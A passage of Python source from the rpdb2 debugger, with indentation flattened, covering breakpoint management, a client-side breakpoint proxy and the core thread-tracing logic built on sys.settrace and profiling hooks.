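# fbi = manager.getFile('/path/to/script.py')
# (scope_info, line) = fbi.FindScopeByLineno(12)
# print_debug('Scope %s, breakpoint will land on line %d' % (scope_info.m_fqn, line))
#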
#
# -------------------------------- Break Point Manager -----------------------------
#
def breakpoint_copy(bp):
if bp is None:
return None
_bp = copy.copy(bp)
#filename = g_found_unicode_files.get(bp.m_filename, bp.m_filename)
_bp.m_filename = as_unicode(bp.m_filename, sys.getfilesystemencoding())
_bp.m_code = None
return _bp
class CBreakPoint(object):
def __init__(self, filename, scope_fqn, scope_first_line, lineno, fEnabled, expr, encoding, fTemporary = False):
"""
Breakpoint constructor.
scope_fqn - scope fully qualified name. e.g: module.class.method
"""
self.m_id = None
self.m_fEnabled = fEnabled
self.m_filename = filename
self.m_scope_fqn = scope_fqn
self.m_scope_name = scope_fqn.split(SCOPE_SEP)[-1]
self.m_scope_first_line = scope_first_line
self.m_scope_offset = lineno - scope_first_line
self.m_lineno = lineno
self.m_expr = expr
self.m_encoding = encoding
self.m_code = None
self.m_fTemporary = fTemporary
if (expr is not None) and (expr != ''):
_expr = as_bytes(ENCODING_SOURCE % encoding + expr, encoding)
print_debug('Breakpoint expression: %s' % repr(_expr))
self.m_code = compile(_expr, '<string>', 'eval')
def __reduce__(self):
rv = (copy_reg.__newobj__, (type(self), ), vars(self), None, None)
return rv
def calc_enclosing_scope_name(self):
if self.m_scope_offset != 0:
return None
if self.m_scope_fqn in [MODULE_SCOPE, MODULE_SCOPE2]:
return None
scope_name_list = self.m_scope_fqn.split(SCOPE_SEP)
enclosing_scope_name = scope_name_list[-2]
return enclosing_scope_name
def enable(self):
self.m_fEnabled = True
def disable(self):
self.m_fEnabled = False
def isEnabled(self):
return self.m_fEnabled
def __str__(self):
return "('" + self.m_filename + "', '" + self.m_scope_fqn + "', " + str(self.m_scope_first_line) + ', ' + str(self.m_scope_offset) + ', ' + str(self.m_lineno) + ')'
class CBreakPointsManagerProxy:
"""
A proxy for the breakpoint manager.
While the breakpoint manager resides on the debuggee (the server),
the proxy resides in the debugger (the client - session manager)
"""
def __init__(self, session_manager):
self.m_session_manager = session_manager
self.m_break_points_by_file = {}
self.m_break_points_by_id = {}
self.m_lock = threading.Lock()
#
# The breakpoint proxy inserts itself between the two chained
# event dispatchers in the session manager.
#
event_type_dict = {CEventBreakpoint: {}}
self.m_session_manager.m_event_dispatcher_proxy.register_callback(self.update_bp, event_type_dict, fSingleUse = False)
self.m_session_manager.m_event_dispatcher.register_chain_override(event_type_dict)
def update_bp(self, event):
"""
Handle breakpoint updates that arrive via the event dispatcher.
"""
try:
self.m_lock.acquire()
if event.m_fAll:
id_list = list(self.m_break_points_by_id.keys())
else:
id_list = event.m_id_list
if event.m_action == CEventBreakpoint.REMOVE:
for id in id_list:
try:
bp = self.m_break_points_by_id.pop(id)
bpm = self.m_break_points_by_file[bp.m_filename]
del bpm[bp.m_lineno]
if len(bpm) == 0:
del self.m_break_points_by_file[bp.m_filename]
except KeyError:
pass
return
if event.m_action == CEventBreakpoint.DISABLE:
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
bp.disable()
except KeyError:
pass
return
if event.m_action == CEventBreakpoint.ENABLE:
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
bp.enable()
except KeyError:
pass
return
bpm = self.m_break_points_by_file.get(event.m_bp.m_filename, {})
bpm[event.m_bp.m_lineno] = event.m_bp
self.m_break_points_by_id[event.m_bp.m_id] = event.m_bp
finally:
self.m_lock.release()
self.m_session_manager.m_event_dispatcher.fire_event(event)
def sync(self):
try:
self.m_lock.acquire()
self.m_break_points_by_file = {}
self.m_break_points_by_id = {}
finally:
self.m_lock.release()
break_points_by_id = self.m_session_manager.getSession().getProxy().get_breakpoints()
try:
self.m_lock.acquire()
self.m_break_points_by_id.update(break_points_by_id)
for bp in list(self.m_break_points_by_id.values()):
bpm = self.m_break_points_by_file.get(bp.m_filename, {})
bpm[bp.m_lineno] = bp
finally:
self.m_lock.release()
def clear(self):
try:
self.m_lock.acquire()
self.m_break_points_by_file = {}
self.m_break_points_by_id = {}
finally:
self.m_lock.release()
def get_breakpoints(self):
return self.m_break_points_by_id
def get_breakpoint(self, filename, lineno):
bpm = self.m_break_points_by_file[filename]
bp = bpm[lineno]
return bp
class CBreakPointsManager:
def __init__(self):
self.m_break_info_manager = CBreakInfoManager()
self.m_active_break_points_by_file = {}
self.m_break_points_by_function = {}
self.m_break_points_by_file = {}
self.m_break_points_by_id = {}
self.m_lock = threading.Lock()
self.m_temp_bp = None
self.m_fhard_tbp = False
def get_active_break_points_by_file(self, filename):
"""
Get active breakpoints for file.
"""
_filename = winlower(filename)
return self.m_active_break_points_by_file.setdefault(_filename, {})
def __calc_active_break_points_by_file(self, filename):
bpmpt = self.m_active_break_points_by_file.setdefault(filename, {})
bpmpt.clear()
bpm = self.m_break_points_by_file.get(filename, {})
for bp in list(bpm.values()):
if bp.m_fEnabled:
bpmpt[bp.m_lineno] = bp
tbp = self.m_temp_bp
if (tbp is not None) and (tbp.m_filename == filename):
bpmpt[tbp.m_lineno] = tbp
def __remove_from_function_list(self, bp):
function_name = bp.m_scope_name
try:
bpf = self.m_break_points_by_function[function_name]
del bpf[bp]
if len(bpf) == 0:
del self.m_break_points_by_function[function_name]
except KeyError:
pass
#
# In some cases a breakpoint belongs to two scopes at the
# same time. For example a breakpoint on the declaration line
# of a function.
#
_function_name = bp.calc_enclosing_scope_name()
if _function_name is None:
return
try:
_bpf = self.m_break_points_by_function[_function_name]
del _bpf[bp]
if len(_bpf) == 0:
del self.m_break_points_by_function[_function_name]
except KeyError:
pass
def __add_to_function_list(self, bp):
function_name = bp.m_scope_name
bpf = self.m_break_points_by_function.setdefault(function_name, {})
bpf[bp] = True
#
# In some cases a breakpoint belongs to two scopes at the
# same time. For example a breakpoint on the declaration line
# of a function.
#
_function_name = bp.calc_enclosing_scope_name()
if _function_name is None:
return
_bpf = self.m_break_points_by_function.setdefault(_function_name, {})
_bpf[bp] = True
def get_breakpoint(self, filename, lineno):
"""
Get breakpoint by file and line number.
"""
bpm = self.m_break_points_by_file[filename]
bp = bpm[lineno]
return bp
def del_temp_breakpoint(self, fLock = True, breakpoint = None):
"""
Delete a temporary breakpoint.
A temporary breakpoint is used when the debugger is asked to
run-to a particular line.
Hard temporary breakpoints are deleted only when actually hit.
"""
if self.m_temp_bp is None:
return
try:
if fLock:
self.m_lock.acquire()
if self.m_temp_bp is None:
return
if self.m_fhard_tbp and not breakpoint is self.m_temp_bp:
return
bp = self.m_temp_bp
self.m_temp_bp = None
self.m_fhard_tbp = False
self.__remove_from_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
finally:
if fLock:
self.m_lock.release()
def set_temp_breakpoint(self, filename, scope, lineno, fhard = False):
"""
Set a temporary breakpoint.
A temporary breakpoint is used when the debugger is asked to
run-to a particular line.
Hard temporary breakpoints are deleted only when actually hit.
"""
_filename = winlower(filename)
mbi = self.m_break_info_manager.getFile(_filename)
if scope != '':
(s, l) = mbi.FindScopeByName(scope, lineno)
else:
(s, l) = mbi.FindScopeByLineno(lineno)
bp = CBreakPoint(_filename, s.m_fqn, s.m_first_line, l, fEnabled = True, expr = as_unicode(''), encoding = as_unicode('utf-8'), fTemporary = True)
try:
self.m_lock.acquire()
self.m_fhard_tbp = False
self.del_temp_breakpoint(fLock = False)
self.m_fhard_tbp = fhard
self.m_temp_bp = bp
self.__add_to_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
finally:
self.m_lock.release()
def set_breakpoint(self, filename, scope, lineno, fEnabled, expr, encoding):
"""
Set breakpoint.
scope - a string (possibly empty) with the dotted scope of the
breakpoint, e.g. 'my_module.my_class.foo'.
expr - a string (possibly empty) with a python expression
that will be evaluated at the scope of the breakpoint.
The breakpoint will be hit if the expression evaluates
to True.
"""
_filename = winlower(filename)
mbi = self.m_break_info_manager.getFile(_filename)
if scope != '':
(s, l) = mbi.FindScopeByName(scope, lineno)
else:
(s, l) = mbi.FindScopeByLineno(lineno)
bp = CBreakPoint(_filename, s.m_fqn, s.m_first_line, l, fEnabled, expr, encoding)
try:
self.m_lock.acquire()
bpm = self.m_break_points_by_file.setdefault(_filename, {})
#
# If a breakpoint on the same line is found we use its ID.
# Since the debugger lists breakpoints by IDs, this has
# a similar effect to modifying the breakpoint.
#
try:
old_bp = bpm[l]
id = old_bp.m_id
self.__remove_from_function_list(old_bp)
except KeyError:
#
# Find the smallest available ID.
#
bpids = list(self.m_break_points_by_id.keys())
bpids.sort()
id = 0
while id < len(bpids):
if bpids[id] != id:
break
id += 1
bp.m_id = id
self.m_break_points_by_id[id] = bp
bpm[l] = bp
if fEnabled:
self.__add_to_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
return bp
finally:
self.m_lock.release()
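#
# Illustrative sketch for set_breakpoint() (kept as a comment so it does not
# execute at import time). An empty scope string means the scope is resolved
# from the line number, and the expression is evaluated in the frame of the
# breakpoint, which is hit only when the expression is true. The file path
# is a hypothetical placeholder and must point to readable source.
#
# bp_manager = CBreakPointsManager()
# bp = bp_manager.set_breakpoint(
#     as_unicode('/path/to/script.py'),
#     scope = as_unicode(''),
#     lineno = 12,
#     fEnabled = True,
#     expr = as_unicode('x > 10'),
#     encoding = as_unicode('utf-8'))
#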
def disable_breakpoint(self, id_list, fAll):
"""
Disable breakpoint.
"""
try:
self.m_lock.acquire()
if fAll:
id_list = list(self.m_break_points_by_id.keys())
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
except KeyError:
continue
bp.disable()
self.__remove_from_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
finally:
self.m_lock.release()
def enable_breakpoint(self, id_list, fAll):
"""
Enable breakpoint.
"""
try:
self.m_lock.acquire()
if fAll:
id_list = list(self.m_break_points_by_id.keys())
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
except KeyError:
continue
bp.enable()
self.__add_to_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
finally:
self.m_lock.release()
def delete_breakpoint(self, id_list, fAll):
"""
Delete breakpoint.
"""
try:
self.m_lock.acquire()
if fAll:
id_list = list(self.m_break_points_by_id.keys())
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
except KeyError:
continue
filename = bp.m_filename
lineno = bp.m_lineno
bpm = self.m_break_points_by_file[filename]
if bp == bpm[lineno]:
del bpm[lineno]
if len(bpm) == 0:
del self.m_break_points_by_file[filename]
self.__remove_from_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
del self.m_break_points_by_id[id]
finally:
self.m_lock.release()
def get_breakpoints(self):
return self.m_break_points_by_id
#
# ----------------------------------- Core Debugger ------------------------------------
#
class CCodeContext:
"""
Represents information related to a code object.
"""
def __init__(self, frame, bp_manager):
self.m_code = frame.f_code
self.m_filename = calc_frame_path(frame)
self.m_basename = os.path.basename(self.m_filename)
self.m_file_breakpoints = bp_manager.get_active_break_points_by_file(self.m_filename)
self.m_fExceptionTrap = False
def is_untraced(self):
"""
Return True if this code object should not be traced.
"""
return self.m_basename in [THREADING_FILENAME, DEBUGGER_FILENAME]
def is_exception_trap_frame(self):
"""
Return True if this frame should be a trap for unhandled
exceptions.
"""
if self.m_basename == THREADING_FILENAME:
return True
if self.m_basename == DEBUGGER_FILENAME and self.m_code.co_name in ['__execv', '__execve', '__function_wrapper']:
return True
return False
class CDebuggerCoreThread:
"""
Represents a debugged thread.
This is a core structure of the debugger. It includes most of the
optimization tricks and hacks, and a good number of
subtle bug fixes; be careful not to mess it up...
"""
def __init__(self, name, core_debugger, frame, event):
self.m_thread_id = thread.get_ident()
self.m_thread_name = name
self.m_fBroken = False
self.m_fUnhandledException = False
self.m_frame = frame
self.m_event = event
self.m_ue_lineno = None
self.m_uef_lineno = None
self.m_code_context = core_debugger.get_code_context(frame)
self.m_locals_copy = {}
self.m_core = core_debugger
self.m_bp_manager = core_debugger.m_bp_manager
self.m_frame_lock = threading.Condition()
self.m_frame_external_references = 0
self.m_exc_info = None
self.m_depth = 0
self.set_depth(frame)
def set_depth(self, frame):
self.m_depth = 0
while frame is not None:
self.m_depth += 1
frame = frame.f_back
def profile_recursion(self, frame, event, arg):
if event == 'call':
if self.m_depth > g_recursionlimit:
print_debug('Exceeded recursion limit and caught in profile function.')
try:
#
# The allowed recursion limit was exceeded.
# To view the offending script frame, go two frames
# down the stack with the 'down' console command.
#
raise RuntimeError('maximum recursion depth exceeded')
except:
#
# Schedule the debugger to re-enable the profile hook.
#
self.set_tracers(fsignal_exception = True)
raise
elif event == 'return':
return self.profile(frame, event, arg)
def profile(self, frame, event, arg):
"""
Profiler method.
The Python profiling mechanism is used by the debugger
mainly to handle synchronization issues related to the
lifetime of the frame structure.
"""
#print_debug('profile: %s, %s, %s, %s, %s' % (repr(frame), event, frame.f_code.co_name, frame.f_code.co_filename, repr(arg)[:40]))
if event == 'return':
self.m_depth -= 1
if sys.excepthook != g_excepthook:
set_excepthook()
self.m_frame = frame.f_back
try:
self.m_code_context = self.m_core.m_code_contexts[self.m_frame.f_code]
except AttributeError:
if self.m_event != 'return' and self.m_core.m_ftrap:
#
# An exception is raised from the outer-most frame.
# This means an unhandled exception.
#
self.m_frame = frame
self.m_event = 'exception'
self.m_uef_lineno = self.m_ue_lineno
self.m_fUnhandledException = True
self.m_core._break(self, frame, event, arg)
self.m_uef_lineno = None
if frame in self.m_locals_copy:
self.update_locals()
self.m_frame = None
self.m_core.remove_thread(self.m_thread_id)
sys.setprofile(None)
sys.settrace(self.m_core.trace_dispatch_init)
if self.m_frame_external_references == 0:
return
#
# Wait until no one references the frame object
#
try:
self.m_frame_lock.acquire()
while self.m_frame_external_references != 0:
safe_wait(self.m_frame_lock, 1.0)
finally:
self.m_frame_lock.release()
def frame_acquire(self):
"""
Acquire a reference to the frame.
"""
try:
self.m_frame_lock.acquire()
self.m_frame_external_references += 1
f = self.m_frame
if f is None:
raise ThreadDone
return f
finally:
self.m_frame_lock.release()
def frame_release(self):
"""
Release a reference to the frame.
"""
try:
self.m_frame_lock.acquire()
self.m_frame_external_references -= 1
if self.m_frame_external_references == 0:
self.m_frame_lock.notify()
finally:
self.m_frame_lock.release()
def get_frame(self, base_frame, index, fException = False):
"""
Get frame at index depth down the stack.
Starting from base_frame, return the frame that is 'index' levels
down the stack. If fException is True, use the exception
stack (traceback) instead.
"""
if fException:
tb = get_traceback(base_frame, self)
if tb is None:
raise NoExceptionFound
while tb.tb_next is not None:
tb = tb.tb_next
f = tb.tb_frame
else:
f = base_frame
while f is not None:
if not g_fDebug and f.f_code.co_name == 'rpdb2_import_wrapper':
f = f.f_back
continue
if index <= 0:
break
f = f.f_back
index -= 1
if (index < 0) or (f is None):
raise InvalidFrame
if (self.m_uef_lineno is not None) and (f.f_back is None):
lineno = self.m_uef_lineno
else:
lineno = f.f_lineno
if fException:
tb = get_traceback(base_frame, self)
while tb is not None:
if tb.tb_frame == f:
lineno = tb.tb_lineno
break
tb = tb.tb_next
return (f, lineno)
def get_locals_copy(self, frame_index, fException, fReadOnly):
"""
Get globals and locals of frame.
A copy scheme is used for locals to work around a bug in
Python 2.3 and 2.4 that prevents modifying the local dictionary.
"""
try:
base_frame = self.frame_acquire()
(f, lineno) = self.get_frame(base_frame, frame_index, fException)
if fReadOnly:
gc = copy.copy(f.f_globals)
else:
gc = f.f_globals
try:
(lc, olc) = self.m_locals_copy[f]
except KeyError:
if f.f_code.co_name in [MODULE_SCOPE, MODULE_SCOPE2]:
lc = gc
olc = gc
else:
lc = copy.copy(f.f_locals)
olc = copy.copy(lc)
if not fReadOnly:
self.m_locals_copy[f] = (lc, olc)
self.set_local_trace(f)
return (gc, lc, olc)
finally:
f = None
base_frame = None
self.frame_release()
def update_locals_copy(self):
"""
Update copy of locals with changes in locals.
"""
lct = self.m_locals_copy.get(self.m_frame, None)
if lct is None:
return
(lc, base) = lct
cr = copy.copy(self.m_frame.f_locals)
for k in cr:
if not k in base:
lc[k] = cr[k]
continue
if not cr[k] is base[k]:
lc[k] = cr[k]
def update_locals(self):
"""
Update locals with changes from copy of locals.
"""
lct = self.m_locals_copy.pop(self.m_frame, None)
if lct is None:
return
self.m_frame.f_locals.update(lct[0])
def __eval_breakpoint(self, frame, bp):
"""
Return True if the breakpoint is hit.
"""
if not bp.m_fEnabled:
return False
if bp.m_expr == '':
return True
try:
if frame in self.m_locals_copy:
l = self.m_locals_copy[frame][0]
v = eval(bp.m_code, frame.f_globals, l)
else:
v = eval(bp.m_code, frame.f_globals, frame.f_locals)
return (v != False)
except:
return False
def set_local_trace(self, frame, fsignal_exception = False):
"""
Set trace callback of frame.
Specialized trace methods are selected here to save switching time
during actual tracing.
"""
if not self.m_core.m_ftrace:
frame.f_trace = self.trace_dispatch_stop
return
if fsignal_exception:
frame.f_trace = self.trace_dispatch_signal
return
code_context = self.m_core.get_code_context(frame)
if self.m_core.is_break(self, frame):
frame.f_trace = self.trace_dispatch_break
elif code_context.m_fExceptionTrap or (frame.f_back is None):
frame.f_trace = self.trace_dispatch_trap
elif frame.f_code.co_name in self.m_bp_manager.m_break_points_by_function:
frame.f_trace = self.trace_dispatch
elif frame in self.m_locals_copy:
frame.f_trace = self.trace_dispatch
elif frame == self.m_core.m_return_frame:
frame.f_trace = self.trace_dispatch
else:
del frame.f_trace
def set_tracers(self, fsignal_exception = False):
"""
Set trace callbacks for all frames in stack.
"""
try:
try:
f = self.frame_acquire()
while f is not None:
self.set_local_trace(f, fsignal_exception)
f = f.f_back
except ThreadDone:
f = None
finally:
f = None
self.frame_release()
def trace_dispatch_stop(self, frame, event, arg):
"""
Disable tracing for this thread.
"""
if frame in self.m_locals_copy:
self.update_locals()
sys.settrace(None)
sys.setprofile(None)
return None
def trace_dispatch_break(self, frame, event, arg):
"""
Trace method for breaking a thread.
"""
if event not in ['line', 'return', 'exception']:
return frame.f_trace
if event == 'exception':
self.set_exc_info(arg)
self.m_event = event
if frame in self.m_locals_copy:
self.update_locals_copy()
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
def trace_dispatch_call(self, frame, event, arg):
"""
Initial trace method for thread.
"""
if not self.m_core.m_ftrace:
return self.trace_dispatch_stop(frame, event, arg)
self.m_depth += 1
if self.m_depth > g_recursionlimit:
sys.setprofile(self.profile_recursion)
self.m_frame = frame
try:
self.m_code_context = self.m_core.m_code_contexts[frame.f_code]
except KeyError:
self.m_code_context = self.m_core.get_code_context(frame)
if self.m_core.m_fBreak or (self.m_core.m_step_tid == self.m_thread_id):
self.m_event = event
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
if not frame.f_code.co_name in self.m_bp_manager.m_break_points_by_function:
return None
bp = self.m_code_context.m_file_breakpoints.get(frame.f_lineno, None)
if bp is not None and self.__eval_breakpoint(frame, bp):
self.m_event = event
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
return self.trace_dispatch
def trace_dispatch(self, frame, event, arg):
"""
General trace method for thread.
"""
if (event == 'line'):
if frame in self.m_locals_copy:
self.update_locals_copy()
bp = self.m_code_context.m_file_breakpoints.get(frame.f_lineno, None)
if bp is not None and self.__eval_breakpoint(frame, bp):
self.m_event = event
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
if event == 'return':
if frame in self.m_locals_copy:
self.update_locals_copy()
if frame == self.m_core.m_return_frame:
self.m_event = event
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
return None
if event == 'exception':
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
if not is_py3k() and not frame.f_exc_traceback is arg[2]:
(frame.f_exc_type, frame.f_exc_value, frame.f_exc_traceback) = arg
return frame.f_trace
return frame.f_trace
def trace_dispatch_trap(self, frame, event, arg):
"""
Trace method used for frames in which unhandled exceptions
should be caught.
"""
if (event == 'line'):
self.m_event = event
if frame in self.m_locals_copy:
self.update_locals_copy()
bp = self.m_code_context.m_file_breakpoints.get(frame.f_lineno, None)
if bp is not None and self.__eval_breakpoint(frame, bp):
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
if event == 'return':
last_event = self.m_event
self.m_event = event
if frame in self.m_locals_copy:
self.update_locals_copy()
if frame == self.m_core.m_return_frame:
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
if last_event == 'exception':
self.m_event = last_event
return None
if event == 'exception':
self.m_event = event
if self.m_code_context.m_fExceptionTrap and self.m_core.m_ftrap:
self.set_exc_info(arg)
self.m_fUnhandledException = True
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
return frame.f_trace
self.m_ue_lineno = frame.f_lineno
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
if is_py3k():
self.set_exc_info(arg)
elif not frame.f_exc_traceback is arg[2]:
(frame.f_exc_type, frame.f_exc_value, frame.f_exc_traceback) = arg
return frame.f_trace
return frame.f_trace
def trace_dispatch_signal(self, frame, event, arg):
#print_debug('*** trace_dispatch_signal %s, %s, %s' % (frame.f_lineno, event, repr(arg)))
self.set_exc_info(arg)
self.set_tracers()
self.set_depth(frame)
sys.setprofile(self.profile)
return self.trace_dispatch_trap(frame, event, arg)
def set_exc_info(self, arg):
"""
Set exception information.
"""
if arg == None:
return
if is_py3k():
self.m_exc_info = arg
return
(t, v, tb) = arg
while tb is not None:
f = tb.tb_frame
f.f_exc_type = t
f.f_exc_value = v
f.f_exc_traceback = tb
tb = tb.tb_next
def get_exc_info(self):
return self.m_exc_info
def reset_exc_info(self):
self.m_exc_info = None
def is_breakpoint(self):
"""
Calc if current line is hit by breakpoint.
"""
bp = self.m_code_context.m_file_breakpoints.get(self.m_frame.f_lineno, None)
if bp is not None and self.__eval_breakpoint(self.m_frame, bp):
return True
return False
def get_breakpoint(self):
"""
Return current line breakpoint if any.
"""
return self.m_code_context.m_file_breakpoints.get(self.m_frame.f_lineno, None)
class CDebuggerCore:
"""
Base class for the debugger.
Handles basic debugger functionality.
"""
def __init__(self, fembedded = False):
self.m_ftrace = True
self.m_current_ctx = None
self.m_f_first_to_break = True
self.m_f_break_on_init = False
self.m_builtins_hack = None
self.m_timer_embedded_giveup = None
self.m_threads_lock = threading.Condition()
self.m_threads = {}
self.m_event_dispatcher = CEventDispatcher()
self.m_state_manager = CStateManager(STATE_RUNNING, self.m_event_dispatcher)
self.m_ffork_into_child = False
self.m_ffork_auto = False
self.m_fsynchronicity = True
self.m_ftrap = True
self.m_fUnhandledException = False
self.m_fBreak = False
self.m_lastest_event = None
self.m_step_tid = None
self.m_next_frame = None
self.m_return_frame = None
self.m_saved_step = (None, None, None)
self.m_saved_next = None
self.m_bp_manager = CBreakPointsManager()
self.m_code_contexts = {None: None}
self.m_fembedded = fembedded
self.m_embedded_event = threading.Event()
self.m_embedded_sync_t0 = 0
self.m_embedded_sync_t1 = 0
self.m_heartbeats = {0: time.time() + 3600}
def shutdown(self):
self.m_event_dispatcher.shutdown()
self.m_state_manager.shutdown()
def is_embedded(self):
return self.m_fembedded
def send_fork_switch(self, sync_n):
"""
Notify client that debuggee is forking and that it should
try to reconnect to the child.
"""
print_debug('Sending fork switch event')
event = CEventForkSwitch(sync_n)
self.m_event_dispatcher.fire_event(event)
def send_exec_switch(self, sync_n):
"""
Notify client that debuggee is doing an exec and that it should
try to reconnect (in case the exec failed).
"""
print_debug('Sending exec switch event')
event = CEventExecSwitch(sync_n)
self.m_event_dispatcher.fire_event(event)
def send_event_exit(self):
"""
Notify client that the debuggee is shutting down.
"""
event = CEventExit()
self.m_event_dispatcher.fire_event(event)
def send_events(self, event):
pass
def set_request_go_timer(self, timeout):
"""
Set a timeout thread that releases the debugger from waiting for a
client to attach.
"""
self.cancel_request_go_timer()
if timeout is None:
return
_timeout = max(1.0, timeout)
f = lambda: (
self.record_client_heartbeat(0, False, True),
self.request_go()
)
self.m_timer_embedded_giveup = threading.Timer(_timeout, f)
self.m_timer_embedded_giveup.start()
#
# sleep() releases control and allows the timer thread to actually start
# before this scope returns.
#
time.sleep(0.1)
def cancel_request_go_timer(self):
t = self.m_timer_embedded_giveup
if t is not None:
self.m_timer_embedded_giveup = None
t.cancel()
def setbreak(self, f):
"""
Set thread to break on next statement.
"""
if not self.m_ftrace:
return
tid = thread.get_ident()
if not tid in self.m_threads:
return self.settrace(f)
ctx = self.m_threads[tid]
f.f_trace = ctx.trace_dispatch_break
self.m_saved_next = self.m_next_frame
self.m_next_frame = f
def settrace(self, f = None, f_break_on_init = True, timeout = None, builtins_hack = None):
"""
Start tracing mechanism for thread.
"""
if not self.m_ftrace:
return
tid = thread.get_ident()
if tid in self.m_threads:
return
self.set_request_go_timer(timeout)
self.m_f_break_on_init = f_break_on_init
self.m_builtins_hack = builtins_hack
threading.settrace(self.trace_dispatch_init)
sys.settrace(self.trace_dispatch_init)
if f is not None:
f.f_trace = self.trace_dispatch_init
def stoptrace(self):
"""
Stop tracing mechanism.
"""
global g_fignore_atexit
g_fignore_atexit = True
threading.settrace(None)
sys.settrace(None)
sys.setprofile(None)
self.m_ftrace = False
self.set_all_tracers()
try:
self.request_go()
except DebuggerNotBroken:
pass
#self.m_threads = {}
def get_code_context(self, frame):
try:
return self.m_code_contexts[frame.f_code]
except KeyError:
if self.m_builtins_hack != None:
if calc_frame_path(frame) == self.m_builtins_hack:
self.m_builtins_hack = None
frame.f_globals['__builtins__'] = g_builtins_module
code_context = CCodeContext(frame, self.m_bp_manager)
return self.m_code_contexts.setdefault(frame.f_code, code_context)
def get_current_ctx(self):
if len(self.m_threads) == 0:
raise NoThreads
return self.m_current_ctx
def get_ctx(self, tid):
ctx = self.m_threads.get(tid, None)
if ctx == None:
raise ThreadNotFound
return ctx
def wait_for_first_thread(self):
"""
Wait until at least one debuggee thread is alive.
Python can have 0 threads in some circumstances, such as
embedded Python and the Python interpreter console.
"""
if self.m_current_ctx is not None:
return
try:
self.m_threads_lock.acquire()
while self.m_current_ctx is None:
safe_wait(self.m_threads_lock, 1.0)
finally:
self.m_threads_lock.release()
def notify_first_thread(self):
"""
Notify that first thread is available for tracing.
"""
try:
self.m_threads_lock.acquire()
self.m_threads_lock.notify()
finally:
self.m_threads_lock.release()
def set_exception_trap_frame(self, frame):
"""
Set trap for unhandled exceptions in relevant frame.
"""
while frame is not None:
code_context = self.get_code_context(frame)
if code_context.is_exception_trap_frame():
code_context.m_fExceptionTrap = True
return
frame = frame.f_back
def __set_signal_handler(self):
"""
Set rpdb2 to wrap all signal handlers.
"""
for key, value in list(vars(signal).items()):
# All signal names start with SIG
# but don't contain an underscore.
# 'SIGRTMIN' and 'SIGRTMAX' are not actual signals.
if not key.startswith('SIG') or key.startswith("SIG_") or key in ['SIGRTMIN', 'SIGRTMAX'] :
continue
handler = signal.getsignal(value)
if handler in [signal.SIG_IGN, signal.SIG_DFL]:
continue
try:
signal.signal(value, handler)
except:
print_debug('Failed to set signal handler for signal %s(%d)' % (key, value))
def clear_source_cache(self):
g_lines_cache.clear()
event = CEventClearSourceCache()
self.m_event_dispatcher.fire_event(event)
def trace_dispatch_init(self, frame, event, arg):
"""
Initial tracing method.
"""
if event not in ['call', 'line', 'return']:
return None
code_context = self.get_code_context(frame)
if event == 'call' and code_context.is_untraced():
return None
self.set_exception_trap_frame(frame)
try:
t = current_thread()
name = thread_get_name(t)
except:
name = ''
if name == 'MainThread':
self.__set_signal_handler()
ctx = CDebuggerCoreThread(name, self, frame, event)
ctx.set_tracers()
try:
self.m_threads_lock.acquire()
self.m_threads[ctx.m_thread_id] = ctx
nthreads = len(self.m_threads)
if nthreads == 1:
self.prepare_embedded_sync()
finally:
self.m_threads_lock.release()
if nthreads == 1:
self.clear_source_cache()
self.m_current_ctx = ctx
self.notify_first_thread()
if self.m_f_break_on_init:
self.m_f_break_on_init = False
self.request_break()
sys.settrace(ctx.trace_dispatch_call)
sys.setprofile(ctx.profile)
self.wait_embedded_sync(nthreads == 1)
if event == 'call':
return ctx.trace_dispatch_call(frame, event, arg)
elif hasattr(frame, 'f_trace') and (frame.f_trace is not None):
return frame.f_trace(frame, event, arg)
else:
return None
def prepare_embedded_sync(self):
if not self.m_fembedded:
return
t = time.time()
t0 = self.m_embedded_sync_t0
if t0 != 0:
self.fix_heartbeats(t - t0)
if self.get_clients_attached() == 0:
return
if t - t0 < EMBEDDED_SYNC_THRESHOLD:
return
self.m_embedded_sync_t1 = t
self.m_embedded_event.clear()
def wait_embedded_sync(self, ftrigger):
if not self.m_fembedded:
return
t = time.time()
t0 = self.m_embedded_sync_t0
t1 = self.m_embedded_sync_t1
if t - t0 < EMBEDDED_SYNC_THRESHOLD:
return
if t - t1 >= EMBEDDED_SYNC_TIMEOUT:
return
if ftrigger:
event = CEventEmbeddedSync()
self.m_event_dispatcher.fire_event(event)
safe_wait(self.m_embedded_event, EMBEDDED_SYNC_TIMEOUT - (t - t1))
if ftrigger:
self.m_embedded_sync_t1 = 0
def embedded_sync(self):
self.m_embedded_event.set()
def set_all_tracers(self):
"""
Set trace methods for all frames of all threads.
"""
for ctx in list(self.m_threads.values()):
ctx.set_tracers()
def remove_thread(self, thread_id):
try:
del self.m_threads[thread_id]
if self.m_current_ctx.m_thread_id == thread_id:
self.m_current_ctx = list(self.m_threads.values())[0]
except (KeyError, IndexError):
self.m_embedded_sync_t0 = time.time()
def set_break_flag(self):
self.m_fBreak = (self.m_state_manager.get_state() == STATE_BROKEN)
def is_break(self, ctx, frame, event = None):
